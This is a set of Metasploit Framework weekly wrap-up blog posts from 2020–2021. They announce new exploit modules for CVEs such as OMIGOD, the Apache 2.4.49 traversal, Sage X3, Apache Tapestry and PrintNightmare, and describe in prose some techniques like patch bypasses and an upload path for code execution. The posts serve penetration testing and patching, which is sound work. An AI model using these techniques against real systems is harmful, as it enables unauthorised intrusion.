Microsoft OMI Management Interface Authentication Bypass by wvu, Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits CVE-2021-38647 – We added an unauthenticated RCE exploit for Microsoft OMI "OMIGOD" CVE-2021-38647. Successful exploitation grants code execution as the root user.
Apache 2.4.49/2.4.50 Traversal RCE by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits CVE-2021-41773 and CVE-2021-42013 – This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
Browse the session filesystem in a Web Browser by timwr – This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.

Enhancements and features

#15681 from smashery – This adds support for reverse port forwarding via established SSH sessions.
#15778 from k0pak4 – This PR adds documentation for the http trace scanner.
#15788 from zeroSteiner – When generating a Powershell command payload would exceed the maximum length allowed to successfully execute, gracefully fall back to omitting an ASMI bypass.
#15803 from k0pak4 – This adds f5_bigip_virtual_server scanner documentation.

Bugs fixed

#15799 from adfoster-r7 – This fixes a crash in the iis_internal_ip module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest version of Metasploit Framework. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-07-23 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/

Metasploit Wrap-Up

Now I Control Your Resource Planning Servers

Sage X3 is a resource planning product designed by Sage Group which is designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well wait no more, as thanks to the work of Aaron Herndon, Jonathan Peterson, William Vu, Cale Black, and Ryan Villarreal along with work from community contributor deadjakk, Metasploit now has an exploit module for CVE-2020-7388 and CVE-2020-7387, to allow unauthenticated attackers to gain SYSTEM level code execution on affected versions of Sage X3. This module should prove very useful on engagements both as a way to gain an initial foothold in a target network, as well as a way to elevate privileges to allow for more effective pivoting throughout the target network. More information on these vulnerabilities can be found in our detailed writeup post on our blog.

Help My Server is Raining Keys

Another great module that landed this week was an exploit for CVE-2021-27850 from Johannes Mortiz and Yann Castel aka Hakyac, which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications as it is often used to sign important data within the application. However in the case of Apache Tapestry, one can actually take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadgets such as CommonBeansUtil1 from ysoserial. Therefore this should be one to keep an eye out for and patch if you haven’t already.

PrintNightmare Improvements

Improvements have been made to the PrintNightmare module thanks to Spencer McIntyre to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the \??\UNC\ bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit’s DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet. These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.

New module content (4)

Apache Tapestry HMAC secret key leak by Johannes Moritz and Hakyac, which exploits CVE-2021-27850 – This adds an auxiliary module that retrieves the secret HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. Retrieving this key will allow an attacker to sign objects in order to exploit a separate Java deserialization vulnerability in Apache Tapestry.
Sage X3 AdxAdmin Login Scanner by Jonathan Peterson – Added a Sage X3 login scanner.
WordPress Plugin Backup Guard – Authenticated Remote Code Execution by Nguyen Van Khanh, Ron Jost, and Hakyac, which exploits CVE-2021-24155 – This adds a module that exploits an authenticated file upload vulnerability in the WordPress plugin, Backup Guard. For versions below v1.6.0, the plugin permits the upload of arbitrary php code due to insufficient checks on the file format. Once the file is uploaded, code execution can be achieved by requesting the file, located under the /wp-content/uploads/backup-guard directory.
Sage X3 Administration Service Authentication Bypass Command Execution by Aaron Herndon and Jonathan Peterson, which exploits CVE-2020-7388– Added an exploit for CVE-2020-7387 + CVE-2020-7388.

Enhancements and features

#15403 from pingport80 – This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.
#15409 from zeroSteiner – An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not and to now automatically converts UNC paths to use the \??\UNC\host\path\to\dll format to bypass the second and most recent patch at the time of writing. Additionally a bug was fixed in the DCERPC library where data that was read would be incomplete when the response would not fit into a single fragment to ensure that the PrintNightmare module can now read long responses from the target such as when enumerating the installed printer drivers.
#15440 from bwatters-r7 – This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

Bugs fixed

#14683 from gwillcox-r7 – This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.
#15436 from sjanusz-r7 – Ensure that generated variable names aren’t Java keywords
#15443 from dwelch-r7 – Adds python3 support for the wmiexec external module auxiliary/scanner/smb/impacket/wmiexec
#15445 from zeroSteiner – Updates msfconsole’s output logs to only show the target’s ip when an exploit module is run, rather than a host-hash

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Wrap-Up

2020-12-18 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2020/12/18/metasploit-wrap-up-92/

Metasploit Wrap-Up

It’s the week of December 17th and that can only mean one thing: a week until Christmas! For those of you who don’t celebrate Christmas, a very happy Hanukkah/Chanukah, Kwanzaa, Diwali, Chinese New Year, Winter Solstice and Las Posadas to you all!

This is our last weekly wrap-up this year, but as always, we’ll be publishing an annual Metasploit wrap-up just after the new year that covers all the shells we got in 2020.

Without further ado, let’s jump into it!

CVE-2020-1054: I heard you still got Windows 7, so let’s play a game

Oh dear Windows 7, you just can’t catch a break. timwr continued his LPE contributions this week with a exploit for CVE-2020-1054, a OOB write vulnerability via the DrawIconEx() function in win32k.sys. This bug was originally found by bee13oy of Qihoo 360 Vulcan Team and Netanel Ben-Simon and Yoav Alon of Check Point Research and was reported to Microsoft in May 2020. The module targets Windows 7 SP1 x64 and grants SYSTEM level code execution. Whilst Windows 7 is EOL, it is still being used by 17.68% of all Windows computers as of November 2020 according to some statistics. That is still a fair market share even if its popularity has been gradually diminishing over time. Furthermore, although users can update Windows 7, it is now mostly a manual process unless you are on one of Windows extended support plans. This increases the time needed to apply patches and also increases the possibility that users may forget to install specific patches. Hopefully none of your clients’ systems are still running Windows 7, but in case you are on a pen test and happen to encounter one, this exploit might provide the access you need to pivot further into the network.

Parse me to your shell

The second highlight of this week was a PR from our very own wvu-r7 targeting CVE-2020-14871, a buffer overflow within the parse_user_name() function of the PAM (Pluggable Authentication Module) component of Solaris SunSSH running on Oracle Solaris versions 10 and 11. The exploit supports SunSSH 1.1.5 running on solaris 10u11 1/13 (x86) within either VMWare or VirtualBox and grants unauthenticated users a shell as the root user. Pretty nifty stuff!

New modules (2)

Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow by wvu-r7, Aaron Carreras, Hacker Fantastic, Jacob Thompson, and Jeffrey Martin, which exploits CVE-2020-14871
Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation by Netanel Ben-Simon, Yoav Alon, bee13oy, and timwr, which exploits CVE-2020-1054

Enhancements and features

Cygwin SSH Windows Identification by mhagan-r7 improved the SSH login scanner library to help identify Windows systems that are running Cygwin to provide SSH services.
beSECURE Integration by nrathaus added a new plugin for importing beSECURE reports using their API, which can then be used to launch exploits against imported targets.
Use CVE-2020-5752 path traversal bypass for CVE-2019-3999 by bcoles updated the Druva inSync Privilege Escalation module to use the CVE-2020-5752 path traversal bypass when exploiting CVE-2019-3999, thereby allowing users to target users who may have applied the CVE-2019-3999 patch but not the CVE-2020-5752 patch.
Msf::Auxiliary::EPMP: replace hard-coded port 80 with rport by bcoles replaced the hardcoded ports in lib/msf/core/auxiliary/epmp‘s final_cookie variable with the user-configurable rport.

Bugs fixed

fix railgun file_version and add test by timwr fixed a definition used by Meterpreter’s Railgun plugin which was causing a crash when attempting to fetch the version of files on disk.
Replace self with the explicit Module name In AuthServlet lambdas by dwelch-r7 fixes an issue reported by community member LucasAnderson07 involving a regression issue that prevented the msfdb init command from successfully completing.
Eagerly load hrr_rb_ssh within reverse_ssh module by adfoster-r7 fixes a regression issue introduced in Metasploit 6.0.22 which stopped Windows consoles from starting.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub: